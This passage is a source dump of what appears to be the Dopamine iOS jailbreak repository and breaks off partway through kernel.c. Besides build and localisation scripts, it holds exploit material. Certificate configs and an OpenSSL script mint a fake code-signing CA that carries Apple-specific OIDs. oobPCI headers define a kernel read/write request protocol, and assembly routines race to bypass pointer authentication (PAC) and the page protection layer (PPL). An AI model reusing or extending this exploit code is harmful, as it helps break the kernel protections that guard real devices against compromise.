GCC_PREPROCESSOR_DEFINITIONS="GIT_COMMIT_HASH=`git describe --tags --abbrev=0`_`git rev-parse --short HEAD` \ 23 | COMPILE_TIME=`TZ=UTC-8 date \"+%Y%m%d_%H%M%S\"` \ 24 | BUNDLE_ID=page.liam.Dopamine" 25 | 26 | clean: 27 | rm -rf build Payload Dopamine.tipa 28 | 29 | build_clean: 30 | rm -rf Payload build 31 | 32 | FORCE: ; 33 | -------------------------------------------------------------------------------- /Dopamine/localization_keys.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | plutil -convert json "$1".lproj/Localizable.strings -o - | ruby -r json -e 'puts JSON.parse(STDIN.read).keys.sort' 3 | -------------------------------------------------------------------------------- /Dopamine/sort_localizations.sh: -------------------------------------------------------------------------------- 1 | localisort -t ./en.lproj/Localizable.strings -i ./ar.lproj/Localizable.strings -ct -r 2 | localisort -t ./en.lproj/Localizable.strings -i ./da.lproj/Localizable.strings -ct -r 3 | localisort -t ./en.lproj/Localizable.strings -i ./de.lproj/Localizable.strings -ct -r 4 | localisort -t ./en.lproj/Localizable.strings -i ./el.lproj/Localizable.strings -ct -r 5 | localisort -t ./en.lproj/Localizable.strings -i ./fil.lproj/Localizable.strings -ct -r 6 | localisort -t ./en.lproj/Localizable.strings -i ./fr.lproj/Localizable.strings -ct -r 7 | localisort -t ./en.lproj/Localizable.strings -i ./ja.lproj/Localizable.strings -ct -r 8 | localisort -t ./en.lproj/Localizable.strings -i ./kk.lproj/Localizable.strings -ct -r 9 | localisort -t ./en.lproj/Localizable.strings -i ./ko.lproj/Localizable.strings -ct -r 10 | localisort -t ./en.lproj/Localizable.strings -i ./nl.lproj/Localizable.strings -ct -r 11 | localisort -t ./en.lproj/Localizable.strings -i ./pl.lproj/Localizable.strings -ct -r 12 | localisort -t ./en.lproj/Localizable.strings -i ./pt-BR.lproj/Localizable.strings -ct -r 13 | localisort -t ./en.lproj/Localizable.strings -i ./ru.lproj/Localizable.strings -ct -r 14 | localisort -t ./en.lproj/Localizable.strings -i ./sv.lproj/Localizable.strings -ct -r 15 | localisort -t ./en.lproj/Localizable.strings -i ./tr.lproj/Localizable.strings -ct -r 16 | localisort -t ./en.lproj/Localizable.strings -i ./uk.lproj/Localizable.strings -ct -r 17 | localisort -t ./en.lproj/Localizable.strings -i ./ur.lproj/Localizable.strings -ct -r 18 | localisort -t ./en.lproj/Localizable.strings -i ./vi.lproj/Localizable.strings -ct -r 19 | localisort -t ./en.lproj/Localizable.strings -i ./zh_CN.lproj/Localizable.strings -ct -r 20 | localisort -t ./en.lproj/Localizable.strings -i ./zh_HK.lproj/Localizable.strings -ct -r 21 | localisort -t ./en.lproj/Localizable.strings -i ./zh_TW.lproj/Localizable.strings -ct -r 22 | localisort -t ./en.lproj/Localizable.strings -i ./zh-Hans.lproj/Localizable.strings -ct -r -------------------------------------------------------------------------------- /Exploits/fastPath/arm.pfx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Exploits/fastPath/arm.pfx -------------------------------------------------------------------------------- /Exploits/fastPath/ca.conf: -------------------------------------------------------------------------------- 1 | [ ca ] 2 | # `man ca` 3 | default_ca = default_ca 4 | 5 | [ default_ca ] 6 | dir = . 7 | private_key = $dir/ca.key 8 | certificate = $dir/ca.crt 9 | policy = policy_loose 10 | new_certs_dir = $dir/nCerts 11 | database = $dir/index.txt 12 | serial = $dir/serial 13 | RANDFILE = $dir/private/.rand 14 | 15 | [ policy_loose ] 16 | # Allow the intermediate CA to sign a more diverse range of certificates. 17 | # See the POLICY FORMAT section of the `ca` man page. 18 | countryName = optional 19 | stateOrProvinceName = optional 20 | localityName = optional 21 | organizationName = optional 22 | organizationalUnitName = optional 23 | commonName = supplied 24 | emailAddress = optional 25 | 26 | [ req ] 27 | # Options for the `req` tool (`man req`). 28 | default_bits = 2048 29 | distinguished_name = req_distinguished_name 30 | string_mask = utf8only 31 | 32 | # SHA-1 is deprecated, so use SHA-2 instead. 33 | default_md = sha256 34 | 35 | # Extension to add when the -x509 option is used. 36 | x509_extensions = v3_ca 37 | 38 | [ req_distinguished_name ] 39 | # See . 40 | countryName = Country Name (2 letter code) 41 | stateOrProvinceName = State or Province Name 42 | localityName = Locality Name 43 | 0.organizationName = Organization Name 44 | organizationalUnitName = Organizational Unit Name 45 | commonName = Common Name 46 | emailAddress = Email Address 47 | 48 | # Optionally, specify some defaults. 49 | countryName_default = DE 50 | stateOrProvinceName_default = Germany 51 | localityName_default = Boppard 52 | 0.organizationName_default = Pinauten GmbH 53 | organizationalUnitName_default = Pinauten 54 | emailAddress_default = contact@pinauten.de 55 | commonName_default = Pinauten PWN CA 56 | 57 | [ v3_ca ] 58 | # Extensions for a typical CA (`man x509v3_config`). 59 | basicConstraints = critical, CA:true 60 | keyUsage = critical, digitalSignature, keyCertSign 61 | extendedKeyUsage = codeSigning 62 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 63 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 64 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 65 | 66 | [ v3_intermediate_ca ] 67 | # Extensions for a typical CA (`man x509v3_config`). 68 | basicConstraints = critical, CA:true 69 | keyUsage = critical, digitalSignature, keyCertSign 70 | extendedKeyUsage = codeSigning 71 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 72 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 73 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 74 | -------------------------------------------------------------------------------- /Exploits/fastPath/clean.sh: -------------------------------------------------------------------------------- 1 | rm -f index.txt.* index.txt ca.key ca.crt cbd.crt itd.crt itd.key itd.csr.pem usr_arm.crt usr_arm.csr.pem usr_arm.key usr_x86_64.crt usr_x86_64.csr.pem usr_x86_64.key serial serial.* 2 | rm -rf ncerts 3 | -------------------------------------------------------------------------------- /Exploits/fastPath/genCrt.sh: -------------------------------------------------------------------------------- 1 | set -e 2 | 3 | openssl genrsa -out ca.key 2048 4 | openssl genrsa -out itd.key 2048 5 | openssl genrsa -out usr_x86_64.key 2048 6 | openssl genrsa -out usr_arm.key 2048 7 | 8 | openssl req -new -x509 -key ca.key -out ca.crt -config ca.conf -days 3650 -batch 9 | openssl req -config itd.conf -new -sha256 -key itd.key -out itd.csr.pem -batch 10 | openssl req -config usr_x86_64.conf -new -sha256 -key usr_x86_64.key -out usr_x86_64.csr.pem -batch 11 | openssl req -config usr_arm.conf -new -sha256 -key usr_arm.key -out usr_arm.csr.pem -batch 12 | 13 | echo 1000 > serial 14 | mkdir -p ncerts 15 | rm -f index.txt.* index.txt && touch index.txt 16 | 17 | openssl ca -config ca.conf -extensions v3_intermediate_ca -days 3650 -notext -in itd.csr.pem -out itd.crt -md sha256 -batch 18 | 19 | rm -f index.txt.* index.txt && touch index.txt 20 | 21 | openssl ca -config itd.conf -extensions x86_64_cert -days 3650 -notext -in usr_x86_64.csr.pem -out usr_x86_64.crt -md sha256 -batch 22 | 23 | rm -f index.txt.* index.txt && touch index.txt 24 | 25 | openssl ca -config itd.conf -extensions arm_cert -days 3650 -notext -in usr_arm.csr.pem -out usr_arm.crt -md sha256 -batch 26 | 27 | cat ca.crt itd.crt > cbd.crt 28 | 29 | openssl pkcs12 -export -out x86_64.pfx -inkey usr_x86_64.key -in usr_x86_64.crt -certfile cbd.crt -password pass:password 30 | openssl pkcs12 -export -out arm.pfx -inkey usr_arm.key -in usr_arm.crt -certfile cbd.crt -password pass:password 31 | -------------------------------------------------------------------------------- /Exploits/fastPath/itd.conf: -------------------------------------------------------------------------------- 1 | [ ca ] 2 | # `man ca` 3 | default_ca = default_ca 4 | 5 | [ default_ca ] 6 | dir = . 7 | private_key = $dir/itd.key 8 | certificate = $dir/itd.crt 9 | policy = policy_loose 10 | new_certs_dir = $dir/nCerts 11 | database = $dir/index.txt 12 | serial = $dir/serial 13 | RANDFILE = $dir/private/.rand 14 | 15 | [ policy_loose ] 16 | # Allow the intermediate CA to sign a more diverse range of certificates. 17 | # See the POLICY FORMAT section of the `ca` man page. 18 | countryName = optional 19 | stateOrProvinceName = optional 20 | localityName = optional 21 | organizationName = optional 22 | organizationalUnitName = optional 23 | commonName = supplied 24 | emailAddress = optional 25 | 26 | [ req ] 27 | # Options for the `req` tool (`man req`). 28 | default_bits = 2048 29 | distinguished_name = req_distinguished_name 30 | string_mask = utf8only 31 | 32 | # SHA-1 is deprecated, so use SHA-2 instead. 33 | default_md = sha256 34 | 35 | # Extension to add when the -x509 option is used. 36 | x509_extensions = v3_ca 37 | 38 | [ req_distinguished_name ] 39 | # See . 40 | countryName = Country Name (2 letter code) 41 | stateOrProvinceName = State or Province Name 42 | localityName = Locality Name 43 | 0.organizationName = Organization Name 44 | organizationalUnitName = Organizational Unit Name 45 | commonName = Common Name 46 | emailAddress = Email Address 47 | 48 | # Optionally, specify some defaults. 49 | countryName_default = DE 50 | stateOrProvinceName_default = Germany 51 | localityName_default = Boppard 52 | 0.organizationName_default = Pinauten GmbH 53 | organizationalUnitName_default = Pinauten 54 | emailAddress_default = contact@pinauten.de 55 | commonName_default = Pinauten PWN Intermediate CA 56 | 57 | [ v3_ca ] 58 | # Extensions for a typical CA (`man x509v3_config`). 59 | basicConstraints = critical, CA:true 60 | keyUsage = critical, digitalSignature, keyCertSign 61 | extendedKeyUsage = codeSigning 62 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 63 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 64 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 65 | 66 | [ x86_64_cert ] 67 | # Extensions for a typical CA (`man x509v3_config`). 68 | basicConstraints = critical, CA:true 69 | keyUsage = critical, digitalSignature, keyCertSign 70 | extendedKeyUsage = codeSigning 71 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 72 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 73 | 74 | [ arm_cert ] 75 | # Extensions for a typical CA (`man x509v3_config`). 76 | basicConstraints = critical, CA:true 77 | keyUsage = critical, digitalSignature, keyCertSign 78 | extendedKeyUsage = codeSigning 79 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 80 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 81 | -------------------------------------------------------------------------------- /Exploits/fastPath/usr_arm.conf: -------------------------------------------------------------------------------- 1 | [ ca ] 2 | # `man ca` 3 | default_ca = default_ca 4 | 5 | [ default_ca ] 6 | dir = . 7 | private_key = $dir/itd.key 8 | certificate = $dir/itd.crt 9 | policy = policy_loose 10 | new_certs_dir = $dir/nCerts 11 | database = $dir/index.txt 12 | serial = $dir/serial 13 | RANDFILE = $dir/private/.rand 14 | 15 | [ policy_loose ] 16 | # Allow the intermediate CA to sign a more diverse range of certificates. 17 | # See the POLICY FORMAT section of the `ca` man page. 18 | countryName = optional 19 | stateOrProvinceName = optional 20 | localityName = optional 21 | organizationName = optional 22 | organizationalUnitName = optional 23 | commonName = supplied 24 | emailAddress = optional 25 | 26 | [ req ] 27 | # Options for the `req` tool (`man req`). 28 | default_bits = 2048 29 | distinguished_name = req_distinguished_name 30 | string_mask = utf8only 31 | 32 | # SHA-1 is deprecated, so use SHA-2 instead. 33 | default_md = sha256 34 | 35 | # Extension to add when the -x509 option is used. 36 | x509_extensions = v3_ca 37 | 38 | [ req_distinguished_name ] 39 | # See . 40 | countryName = Country Name (2 letter code) 41 | stateOrProvinceName = State or Province Name 42 | localityName = Locality Name 43 | 0.organizationName = Organization Name 44 | organizationalUnitName = Organizational Unit Name 45 | commonName = Common Name 46 | emailAddress = Email Address 47 | 48 | # Optionally, specify some defaults. 49 | countryName_default = DE 50 | stateOrProvinceName_default = Germany 51 | localityName_default = Boppard 52 | 0.organizationName_default = Pinauten GmbH 53 | organizationalUnitName_default = Pinauten 54 | emailAddress_default = contact@pinauten.de 55 | commonName_default = Pinauten PWN Cert 56 | 57 | [ v3_ca ] 58 | # Extensions for a typical CA (`man x509v3_config`). 59 | basicConstraints = critical, CA:true 60 | keyUsage = critical, digitalSignature, keyCertSign 61 | extendedKeyUsage = codeSigning 62 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 63 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 64 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 65 | -------------------------------------------------------------------------------- /Exploits/fastPath/usr_x86_64.conf: -------------------------------------------------------------------------------- 1 | [ ca ] 2 | # `man ca` 3 | default_ca = default_ca 4 | 5 | [ default_ca ] 6 | dir = . 7 | private_key = $dir/itd.key 8 | certificate = $dir/itd.crt 9 | policy = policy_loose 10 | new_certs_dir = $dir/nCerts 11 | database = $dir/index.txt 12 | serial = $dir/serial 13 | RANDFILE = $dir/private/.rand 14 | 15 | [ policy_loose ] 16 | # Allow the intermediate CA to sign a more diverse range of certificates. 17 | # See the POLICY FORMAT section of the `ca` man page. 18 | countryName = optional 19 | stateOrProvinceName = optional 20 | localityName = optional 21 | organizationName = optional 22 | organizationalUnitName = optional 23 | commonName = supplied 24 | emailAddress = optional 25 | 26 | [ req ] 27 | # Options for the `req` tool (`man req`). 28 | default_bits = 2048 29 | distinguished_name = req_distinguished_name 30 | string_mask = utf8only 31 | 32 | # SHA-1 is deprecated, so use SHA-2 instead. 33 | default_md = sha256 34 | 35 | # Extension to add when the -x509 option is used. 36 | x509_extensions = v3_ca 37 | 38 | [ req_distinguished_name ] 39 | # See . 40 | countryName = Country Name (2 letter code) 41 | stateOrProvinceName = State or Province Name 42 | localityName = Locality Name 43 | 0.organizationName = Organization Name 44 | organizationalUnitName = Organizational Unit Name 45 | commonName = Common Name 46 | emailAddress = Email Address 47 | 48 | # Optionally, specify some defaults. 49 | countryName_default = DE 50 | stateOrProvinceName_default = Germany 51 | localityName_default = Boppard 52 | 0.organizationName_default = Pinauten GmbH 53 | organizationalUnitName_default = Pinauten 54 | emailAddress_default = contact@pinauten.de 55 | commonName_default = Pinauten PWN Cert 56 | 57 | [ v3_ca ] 58 | # Extensions for a typical CA (`man x509v3_config`). 59 | basicConstraints = critical, CA:true 60 | keyUsage = critical, digitalSignature, keyCertSign 61 | extendedKeyUsage = codeSigning 62 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 63 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 64 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 65 | -------------------------------------------------------------------------------- /Exploits/fastPath/x86_64.pfx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Exploits/fastPath/x86_64.pfx -------------------------------------------------------------------------------- /Exploits/oobPCI/.gitignore: -------------------------------------------------------------------------------- 1 | /build 2 | /oobPCI 3 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Makefile: -------------------------------------------------------------------------------- 1 | SDK=macosx 2 | TARGET=arm64-apple-macos12.0 3 | 4 | CC=xcrun -sdk $(SDK) clang 5 | 6 | WARNINGS=-Wall -Wpedantic -Werror 7 | NO_WARNINGS=-Wno-gnu-statement-expression -Wno-gnu-zero-variadic-macro-arguments -Wno-gnu-empty-struct -Wno-dollar-in-identifier-extension -Wno-language-extension-token -Wno-zero-length-array 8 | CFLAGS=-target $(TARGET) -D__arm64__ -D__aarch64__ -D__DARWIN_OPAQUE_ARM_THREAD_STATE64 -nostdlib -O0 $(WARNINGS) $(NO_WARNINGS) 9 | LDFLAGS=-target $(TARGET) -nostdlib -dead-strip -fpie -lSystem 10 | 11 | MIG_SOURCES=$(wildcard Sources/*.defs) 12 | MIG_GENERATED_SOURCES=$(addprefix Sources/generated/,$(patsubst %.defs,%.c,$(notdir $(MIG_SOURCES)))) 13 | MIG_GENERATED_HEADERS=$(addprefix Sources/generated/,$(patsubst %.defs,%.h,$(notdir $(MIG_SOURCES)))) 14 | 15 | SOURCES=$(wildcard Sources/*.c) $(wildcard Sources/*.S) $(MIG_GENERATED_SOURCES) 16 | OBJS=$(addprefix build/,$(patsubst %.c,%.o,$(patsubst %.S,%.o,$(SOURCES)))) 17 | 18 | HEADERS=$(wildcard Sources/*.h) $(MIG_GENERATED_HEADERS) 19 | 20 | OUTPUT_DIRS=$(dir $(OBJS)) 21 | 22 | all: oobPCI 23 | 24 | .PHONY: all build_clean clean 25 | 26 | oobPCI: build/oobPCI 27 | install_name_tool -change /usr/lib/libSystem.B.dylib /System/DriverKit/System/Library/Frameworks/DriverKit.framework/DriverKit $< 28 | ../../Tools/Exe2Driver/Exe2Driver $< $@ 29 | @chmod +x $@ 30 | @ldid -SoobPCI.entitlements $@ 31 | 32 | build/oobPCI: ensure_output_dirs $(MIG_GENERATED_SOURCES) $(MIG_GENERATED_HEADERS) $(OBJS) 33 | $(CC) -o $@ $(OBJS) $(LDFLAGS) 34 | 35 | build/%.o: %.c $(HEADERS) 36 | $(CC) -c -o $@ $< $(CFLAGS) 37 | 38 | build/%.o: %.S $(HEADERS) 39 | $(CC) -c -o $@ $< $(CFLAGS) --std=c++11 40 | 41 | Sources/generated/%.h Sources/generated/%.c: Sources/%.defs 42 | mig -user $(patsubst %.h,%.c,$@) -header $(patsubst %.c,%.h,$@) -server /dev/null -sheader /dev/null $< 43 | 44 | ensure_output_dirs: 45 | mkdir -p $(OUTPUT_DIRS) 46 | 47 | build_clean: 48 | rm -rf build 49 | 50 | clean: build_clean 51 | rm -f oobPCI 52 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/DriverKitClasses.h: -------------------------------------------------------------------------------- 1 | // 2 | // DriverKitClasses.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef DriverKitClasses_h 10 | #define DriverKitClasses_h 11 | 12 | #ifndef DK_DECLARE_CLASS 13 | #define DK_DECLARE_CLASS(name) extern mach_port_t DKCLASS$$$##name; 14 | #endif 15 | 16 | DK_DECLARE_CLASS(IOUserServer) 17 | DK_DECLARE_CLASS(IODispatchQueue) 18 | DK_DECLARE_CLASS(IOBufferMemoryDescriptor) 19 | DK_DECLARE_CLASS(IODMACommand) 20 | 21 | #endif 22 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/Fugu15KRW.h: -------------------------------------------------------------------------------- 1 | // 2 | // Fugu15KRW.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef Fugu15KRW_h 10 | #define Fugu15KRW_h 11 | 12 | #include 13 | 14 | // Yes, Fugu15KRW supports versioning 15 | // No, I don't plan to actually increase the version number 16 | #define FUGU15KRW_VERSION_0 (uint64_t) 0 17 | #define FUGU15KRW_VERSION_CURRENT FUGU15KRW_VERSION_0 18 | 19 | #define FUGU15KRW_ERROR_BAD_SIZE (uint64_t) 1 20 | #define FUGU15KRW_ERROR_BAD_VERSION (uint64_t) 2 21 | #define FUGU15KRW_ERROR_BAD_REQ_ID (uint64_t) 3 22 | 23 | #define FUGU15KRW_REQ_PPL (mach_msg_id_t) 0xF1500 24 | #define FUGU15KRW_REQ_THSIGN (mach_msg_id_t) 0xF1501 25 | #define FUGU15KRW_REQ_OFFSETS (mach_msg_id_t) 0xF1502 26 | 27 | #define FUGU15KRW_REPLY_PPL (mach_msg_id_t) 0x52F1500 28 | #define FUGU15KRW_REPLY_THSIGN (mach_msg_id_t) 0x52F1501 29 | #define FUGU15KRW_REPLY_OFFSETS (mach_msg_id_t) 0x52F1502 30 | 31 | #define FUGU15KRW_REPLY_ERROR (mach_msg_id_t) 0x46457272 32 | 33 | typedef struct { 34 | mach_msg_header_t mach_header; 35 | uint64_t version; // Our version 36 | uint64_t versionMin; // The minimum version the server has to support 37 | } Fugu15KRWRequestCommon; 38 | 39 | typedef struct { 40 | mach_msg_header_t mach_header; 41 | uint64_t version; // Server version 42 | } Fugu15KRWReplyCommon; 43 | 44 | typedef struct { 45 | Fugu15KRWRequestCommon header; 46 | } Fugu15PPLMapRequest; 47 | 48 | typedef struct { 49 | Fugu15KRWReplyCommon header; 50 | uint64_t mapAddr; 51 | } Fugu15PPLMapReply; 52 | 53 | typedef struct { 54 | Fugu15KRWRequestCommon header; 55 | uint64_t signAddr; 56 | } Fugu15ThSignRequest; 57 | 58 | typedef struct { 59 | Fugu15KRWReplyCommon header; 60 | } Fugu15ThSignReply; 61 | 62 | typedef struct { 63 | Fugu15KRWRequestCommon header; 64 | } Fugu15OffsetsRequest; 65 | 66 | typedef struct { 67 | Fugu15KRWReplyCommon header; 68 | uint64_t virtualBase; // As reported in the boot args structure 69 | uint64_t physicalBase; // As reported in the boot args structure 70 | uint64_t vKernelBase; // pKernelBase = vKernelBase - virtualBase + physicalBase 71 | uint64_t kernelSlide; // vKernelBase - default kernel load address 72 | uint64_t kernelTTEP; // Root translation table of the kernel, physical address 73 | } Fugu15OffsetsReply; 74 | 75 | typedef struct { 76 | Fugu15KRWReplyCommon header; 77 | uint64_t errorCode; 78 | } Fugu15ErrorReply; 79 | 80 | #endif /* Fugu15KRW_h */ 81 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/asm.S: -------------------------------------------------------------------------------- 1 | // 2 | // asm.S 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | .text 10 | 11 | .align 4 12 | 13 | #define SYSCALL_PROLOGUE stp x0, x1, [sp, -16]! %% stp x2, x3, [sp, -16]! %% stp x4, x5, [sp, -16]! %% stp x6, x7, [sp, -16]! 14 | #define SYSCALL_EPILOGUE ldp x6, x7, [sp], 16 %% ldp x4, x5, [sp], 16 %% ldp x2, x3, [sp], 16 %% ldp x0, x1, [sp], 16 15 | 16 | #define DEF_SYSCALL(name, num) .global _##name %% _##name: %% SYSCALL_PROLOGUE %% mov x16, num %% svc #0x80 %% mov x16, x0 %% SYSCALL_EPILOGUE %% bcc name##_end %% cmp x16, #4 %% beq _##name %% mov x16, #-1 %% name##_end: %% mov x0, x16 %% ret 17 | #define DEF_MACHTRAP(name, num) .global _##name %% _##name: %% mov x16, -num %% svc #0x80 %% ret 18 | 19 | .global start 20 | start: 21 | b _main 22 | 23 | .global _pac_exploit_thread 24 | _pac_exploit_thread: 25 | mov x0, x20 26 | bl _mach_port_mod_refs 27 | b _pac_exploit_thread 28 | 29 | .global _pac_exploit_doIt 30 | _pac_exploit_doIt: 31 | ldr x24, [x11, x25] 32 | dmb sy 33 | cmp x24, x20 34 | bne _pac_exploit_doIt 35 | _pac_exploit_doIt_cont: 36 | str x19, [x11, x26] 37 | dmb sy 38 | ldr x24, [x11, x25] 39 | dmb sy 40 | cmp x24, x20 41 | bne _pac_exploit_doIt 42 | str x18, [x11, x27] 43 | dmb sy 44 | b _pac_exploit_doIt_cont 45 | 46 | .global _pac_loop 47 | _pac_loop: 48 | mov x0, #1 49 | adrp x1, _gUserReturnDidHappen@PAGE 50 | str x0, [x1, _gUserReturnDidHappen@PAGEOFF] 51 | b _pac_loop 52 | 53 | .global _ppl_loop 54 | _ppl_loop: 55 | // x0 -> Value to write 56 | // x1 -> Address to write to 57 | // x2 -> Address of done variable 58 | // x3 -> Address of ready variable 59 | mov x4, 1 60 | str x4, [x3] 61 | _ppl_loop_inner: 62 | str x0, [x1] 63 | ldr x3, [x2] 64 | cmp x3, xzr 65 | beq _ppl_loop_inner 66 | _ppl_yield_loop: 67 | // We are done, constantly yield until we're stopped 68 | mov x0, 0 69 | mov x1, 0 70 | mov x2, 0 71 | bl _thread_switch 72 | b _ppl_yield_loop 73 | 74 | .global _ppl_done 75 | _ppl_done: 76 | b _ppl_done 77 | 78 | DEF_SYSCALL(exit, 1) 79 | DEF_SYSCALL(write, 4) 80 | DEF_SYSCALL(getpid, 20) 81 | DEF_SYSCALL(getppid, 39) 82 | DEF_SYSCALL(__semwait_signal, 334) 83 | 84 | DEF_MACHTRAP(vm_allocate, 10) 85 | DEF_MACHTRAP(vm_deallocate, 12) 86 | DEF_MACHTRAP(vm_protect, 14) 87 | DEF_MACHTRAP(mach_port_allocate, 16) 88 | DEF_MACHTRAP(mach_port_deallocate, 18) 89 | DEF_MACHTRAP(mach_port_mod_refs, 19) 90 | DEF_MACHTRAP(mach_port_insert_right, 21) 91 | DEF_MACHTRAP(mach_reply_port, 26) 92 | DEF_MACHTRAP(mach_thread_self, 27) 93 | DEF_MACHTRAP(mach_task_self, 28) 94 | DEF_MACHTRAP(mach_host_self, 29) 95 | DEF_MACHTRAP(mach_msg_trap, 31) 96 | DEF_MACHTRAP(mach_msg_overwrite_trap, 32) 97 | DEF_MACHTRAP(thread_switch, 61) 98 | 99 | .data 100 | retvalStorage: 101 | .quad 0 102 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/badRecovery.h: -------------------------------------------------------------------------------- 1 | // 2 | // badRecovery.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef badRecovery_h 10 | #define badRecovery_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | typedef struct { 17 | uint64_t unk; 18 | uint64_t x[29]; 19 | uint64_t fp; 20 | uint64_t lr; 21 | uint64_t sp; 22 | uint64_t pc; 23 | uint32_t cpsr; 24 | // Other stuff 25 | uint64_t other[70]; 26 | } kRegisterState; 27 | 28 | typedef struct { 29 | bool inited; 30 | thread_t gExploitThread; 31 | uint64_t gScratchMemKern; 32 | volatile uint64_t *gScratchMemMapped; 33 | arm_thread_state64_t gExploitThreadState; 34 | uint64_t gSpecialMemRegion; 35 | uint64_t gIntStack; 36 | uint64_t gOrigIntStack; 37 | uint64_t gReturnContext; 38 | uint64_t gACTPtr; 39 | uint64_t gACTVal; 40 | uint64_t gCPUData; 41 | } exploitThreadInfo; 42 | 43 | typedef struct { 44 | bool inited; 45 | thread_t thread; 46 | uint64_t actContext; 47 | kRegisterState signedState; 48 | uint64_t kernelStack; 49 | kRegisterState *mappedState; 50 | uint64_t scratchMemory; 51 | uint64_t *scratchMemoryMapped; 52 | } Fugu14KcallThread; 53 | 54 | bool breakCFI(uint64_t kernelBase); 55 | void deinitFugu15PACBypass(void); 56 | 57 | bool setupFugu14Kcall(void); 58 | 59 | void pac_exploit_thread(void); 60 | void pac_exploit_doIt(void); 61 | void pac_loop(void); 62 | 63 | void ppl_loop(void); 64 | void ppl_done(void); 65 | 66 | void kexec(kRegisterState *state, exploitThreadInfo *info); 67 | uint64_t kcall(uint64_t func, uint64_t a1, uint64_t a2, uint64_t a3, uint64_t a4, uint64_t a5, uint64_t a6, uint64_t a7, uint64_t a8); 68 | 69 | bool kexec_on_new_thread(kRegisterState *kState, thread_t *thread); 70 | 71 | #endif /* badRecovery_h */ 72 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/includeme.h: -------------------------------------------------------------------------------- 1 | // 2 | // includeme.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef includeme_h 10 | #define includeme_h 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | // SpawnDrv/kexploitd helper functions 18 | #define DBG_DK_FUNC(id) ptrauth_sign_unauthenticated((void*)(0x4142434400ULL + (id * 4ULL)), ptrauth_key_function_pointer, 0) 19 | #define DBG_EXPLOIT_FUNC(id) ptrauth_sign_unauthenticated((void*)(0x4841585800ULL + (id * 4ULL)), ptrauth_key_function_pointer, 0) 20 | 21 | #define DBG_DK_FUNC_CHECKIN DBG_DK_FUNC(0) 22 | #define DBG_DK_FUNC_NOTIFY DBG_DK_FUNC(1) 23 | #define DBG_DK_FUNC_GET_PCI_SIZE DBG_DK_FUNC(2) 24 | 25 | #define DBG_GETOFFSETS_FUNC DBG_EXPLOIT_FUNC(0) 26 | #define DBG_KRW_READY_FUNC DBG_EXPLOIT_FUNC(1) 27 | #define DBG_SET_FAULT_HNDLR DBG_EXPLOIT_FUNC(2) 28 | #define DBG_GET_REQUEST DBG_EXPLOIT_FUNC(3) 29 | #define DBG_SEND_REPLY DBG_EXPLOIT_FUNC(4) 30 | // #define DBG_COPYOUT_PORTS DBG_EXPLOIT_FUNC(5) 31 | #define DBG_WRITE_BOOT_INFO_UINT64 DBG_EXPLOIT_FUNC(6) 32 | #define DBG_WRITE_BOOT_INFO_DATA DBG_EXPLOIT_FUNC(7) 33 | 34 | // Debug stuff 35 | #define DBGPRINT_ADDRVAR(var) printf("[DBG] %s: %s @ %p\n", __func__, #var, (void*) var) 36 | #define DBGPRINT_VAR(var) printf("[DBG] %s: %s: %p\n", __func__, #var, (void*) (uint64_t) var) 37 | 38 | // Did I mention that I love Swift? 39 | #define guard(cond) if (__builtin_expect(!!(cond), 1)) {} 40 | 41 | #define MEMORY_BARRIER asm volatile("dmb sy"); 42 | 43 | extern void status_update(const char *status); 44 | 45 | #endif /* includeme_h */ 46 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/kernel.c: -------------------------------------------------------------------------------- 1 | // 2 | // kernel.c 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #include "kernel.h" 10 | 11 | #include "includeme.h" 12 | #include "offsets.h" 13 | #include "badRecovery.h" 14 | 15 | kern_return_t pmap_enter_options_addr(uint64_t pmap, uint64_t pa, uint64_t va) { 16 | uint64_t pmap_enter_options_addr_ptr = SLIDE(gOffsets.pmap_enter_options_addr); 17 | 18 